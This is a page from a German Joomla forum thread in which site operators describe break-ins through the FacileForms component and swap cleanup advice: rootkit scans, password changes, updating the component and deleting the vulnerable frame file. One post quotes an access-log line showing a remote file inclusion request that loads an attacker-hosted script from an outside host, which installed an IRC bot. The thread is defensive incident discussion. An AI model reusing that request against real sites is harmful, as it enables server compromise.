+ Antworten
Seite 3 von 3 ErsteErste 1 2 3
Ergebnis 21 bis 29 von 29

Thema: Hackversuch FacileForms

  1. #21
    Neu an Board
    Registriert seit
    25.02.2006
    Ort
    Stuttgart
    Beiträge
    40
    Bedankte sich
    2
    Erhielt 6 Danksagungen
    in 6 Beiträgen

    Standard

    Zitat Zitat von tkd Beitrag anzeigen
    Hallo,

    mich hat es auch erwischt und es liefen ca. 30 [v6] prozesse, als ich es bemerkt habe. Der Aufruf fand statt wie vorhin schon angegeben:

    "GET /components/com_facileforms/
    facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HT
    TP/1.1" 200 524 "-" "libwww-perl/5.803"

    und auch der download von v6.txt ist nachweislich erfolgt. Leider kann ich die Datei aber nirgends finden, ich nehme an sie wurde beim wechsel zu runlevel 1 gelöscht.
    Ich denke, es wäre trotzdem nicht sicher, das System jetzt (nat. ohne facile-forms) wieder so ans netz zu lassen, oder kann mir jmd. bestätigen das v6.txt keine Manipulation an anderen Dateien vornimmt?

    Wie ist denn die Rechtslage bei so einem Angriff?

    Vielen Dank
    Sollte es das "original" Script von http://perqafohu.com/~armendibx/oki/lol.txt sein,
    nimmt es keine Manipulation an Daten vor, was jedoch nach der Installation des IRC-Bots passiert das weiss wohl nur der Bot-Operator...

    Nach Root-Kits scannen wäre schon mal nicht schlecht, ausserdem hilft ein IDS-System
    bei sowas wahre Wunder

    Das man alle Passwörter ändert und nach neuen Usern in MySQL etc. schaut
    sollte natürlich auch bereits klar sein

  2. #22
    Neu an Board
    Registriert seit
    25.05.2004
    Beiträge
    5
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Zur Lösung des Problems...

    ... ist hier leider noch nicht viel geschrieben worden.

    Wenn ich hier und da zu dem Thema gelesen habe, dann wurde mir ein Update auf Version 1.4.7 nahe gelegt. Das habe ich nun auch runtergeladen, habe aber nur die Dateien im Order /components/com_facileforms mit den neuen überschrieben, um die Daten in der Datenbank nicht zu gefährden.

    Weiß jemand, ob das ausreicht?

    Vielen Dank und Grüße,

    Thomas

  3. #23
    Neu an Board
    Registriert seit
    17.07.2005
    Ort
    Siegen
    Alter
    40
    Beiträge
    52
    Bedankte sich
    5
    Erhielt 2 Danksagungen
    in 2 Beiträgen

    Standard

    Hallo Thomas,

    eigentlich kannst Du ohne Probleme FF deinstallieren und dann die neue Version wieder installieren, da die Daten in der Datenbank bei der Desinstallation nicht gelöscht werden!

    Wichtig ist jetzt, dass Du die Datei "facileforms.frame.php" im Verzeichnis "/components/com_facileforms/" löscht.

    Viele Grüße
    Holger

  4. #24
    Neu an Board
    Registriert seit
    22.09.2006
    Beiträge
    19
    Bedankte sich
    2
    1 Danksagung in 1 Beitrag

    Standard

    eine kurze Frage: Wenn einige hier schreiben, sie seien gehakct worden. Heißt das dann, dass deren Seite und die Datenbak gelöscht worden sind??

    2.) Kann man das verhindern, in dem man den Vögeln keinen Zugriff auf den administrator Ordner gibt, in dem etwa der administrator-ordner mit htaccess geschützt wird?

  5. #25
    chw
    chw ist offline
    Verbringt hier viel Zeit
    Registriert seit
    06.08.2006
    Beiträge
    832
    Bedankte sich
    2
    Erhielt 164 Danksagungen
    in 152 Beiträgen

    Standard

    Meistens löschen die nix, sondern defacen, d.h. sie stellen Ihr Logo auf die startseite oder verlinken zu anderen Seiten. Das ist aber "gut" denn Du siehst sofort das was nicht stimmt. Schlimmer ist es wenn sie ein backdoor,rootkit oder ähnliches installieren und dann Deinen Server z.B. zum Spam versenden nutzen. Das muss Dir nicht sofort auffallen, und auch ein schwacher Server kann in kurzer Zeit tausende von Emails absetzten.

    2.) Kann man das verhindern, in dem man den Vögeln keinen Zugriff auf den administrator Ordner gibt, in dem etwa der administrator-ordner mit htaccess geschützt wird?
    Jain. Der htaccess schutz verhindert nur das direkte zugreifen über die URL, skripte und serverprogramme interessiert das jedoch herzlich wenig.
    Du kannst also das eindringen über die php dateien im admin verz. verhindern, aber nicht das wenn jemand Dein joomla gehackt das hat er diese Dateien verändern kann.

  6. #26
    War schon öfter hier Avatar von marvin42
    Registriert seit
    03.08.2005
    Ort
    Schleswig
    Alter
    44
    Beiträge
    143
    Bedankte sich
    18
    Erhielt 34 Danksagungen
    in 34 Beiträgen

    Rotes Gesicht

    Zitat Zitat von chw Beitrag anzeigen
    Meistens löschen die nix, sondern defacen, d.h. sie stellen Ihr Logo auf die startseite oder verlinken zu anderen Seiten. Das ist aber "gut" denn Du siehst sofort das was nicht stimmt. Schlimmer ist es wenn sie ein backdoor,rootkit oder ähnliches installieren und dann Deinen Server z.B. zum Spam versenden nutzen. Das muss Dir nicht sofort auffallen, und auch ein schwacher Server kann in kurzer Zeit tausende von Emails absetzten.
    Das kann aber auch einhergehen, d. h. auch nach einem Defacement können Dateien auf dem Server zurückgelassen werden, die einen späteren Zugriff oder weitere Aktivitäten im Hintergrund ermöglichen.

    Gruß
    marvin42
    Here I am, brain the size of a planet, and they ask me to take you to the bridge. Call that job satisfaction, 'cause I don't.

  7. #27
    chw
    chw ist offline
    Verbringt hier viel Zeit
    Registriert seit
    06.08.2006
    Beiträge
    832
    Bedankte sich
    2
    Erhielt 164 Danksagungen
    in 152 Beiträgen

    Standard

    Ja natürlich, das ist wohl leider auch die regel das da irgendeine php-shell oder ein Bot zusätzlich installiert wird. Darum sollte man nach einem erfolgreichen Angriff ja auch alles löschen.
    Beim defacing (von scriptkiddies) geht es ja meistens um die egosteigerung einiger kranker realtiätsferner subjekte die wohl sonst nirgends erfolg haben und sich und den anderen gestörten beweisen wollen das sie ganz ohne einsatz des eigenen hirnschmalzes toll mit ner maus klicken können um damit andere zu ärgern.
    Der "vorteil": Dabei merkt man auch als nicht ganz so versierter Homepagebetreiber schnell das was nicht stimmt.
    Wenn irgendein programm oder skript unbemerkt im Hintergund läuft und sonst nichts verändert wurde gibt es bestimmt den ein oder andern der das nicht sofort merkt. (von techniken wie rootkits mal ganz abgesehen).

  8. #28
    Neu an Board Avatar von WolfgangAbbas
    Registriert seit
    10.07.2007
    Ort
    Fulda
    Alter
    42
    Beiträge
    3
    Bedankte sich
    0
    1 Danksagung in 1 Beitrag

    Unglücklich Unfassbar: Retro-Kids

    Der Thread ist nun ein Jahr alt und man könnte meinen, dass dieses Thema sich erledigt hätte. Weit gefehlt! In den letzten zwei Tagen haben "Hacker" mit sehr viel Zeit versucht, über FacileForms den Webserver eines Kunden von mir zu kompromitieren. Auch wenn dies hier (knock, knock, knock) keinen Erfolg hatte, befürchte ich, dass es immer noch genügend veraltete Installationen gibt. Vielleicht sind die Sicherheitslücken von vor drei Jahren wieder hochaktuell? Also: Augen auf.
    Wolfgang Abbas | www.ABBAS-MEDIA.com

  9. #29
    Neu an Board
    Registriert seit
    09.08.2007
    Beiträge
    4
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Oh ja, das kann ich bestätigen.

    Ich bekomme seit dem Wochendende mittlerweile alle 5 Minuten einen Spameintrag, und das, obwohl ich Captcha verwende.

    Das Ganze habe ich heute erst lösen können, indem ich alle Formulare von der Seite entfernt und die Komponente deaktiviert habe.

    Safe Mode ist ON, Register Globals und alle anderen Dinge in jedem Unterornder über eine php.ini geregelt.

    Falls jemand zwischenzeitlich eine Lösung für das Treiben dieser schwachsinnigen Spamkiddies hat - ich wäre dankbar

    LG

+ Antworten
Seite 3 von 3 ErsteErste 1 2 3

Ähnliche Themen

  1. FacileForms funktioniert bei mir nicht mehr nach Upate
    Von baity im Forum Joomla Komponenten
    Antworten: 2
    Letzter Beitrag: 11.04.2006, 02:35
  2. FacileForms 144: kein Menü 'neu, kopieren, veröff...'
    Von fizzler im Forum Joomla Komponenten
    Antworten: 0
    Letzter Beitrag: 23.02.2006, 15:50
  3. Kann FacileForms "Sample Menü" nicht löschen !
    Von chrisw im Forum Mambo Komponenten
    Antworten: 7
    Letzter Beitrag: 01.07.2005, 22:06
  4. FacileForms: Record als Mambo Content übernehmen
    Von alexbeer im Forum Allgemeine Fragen zu Mambo
    Antworten: 0
    Letzter Beitrag: 29.06.2005, 22:27
  5. FacileForms - Ziel für Datensatz ändern
    Von chingon im Forum Mambo Komponenten
    Antworten: 0
    Letzter Beitrag: 20.03.2005, 12:34

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein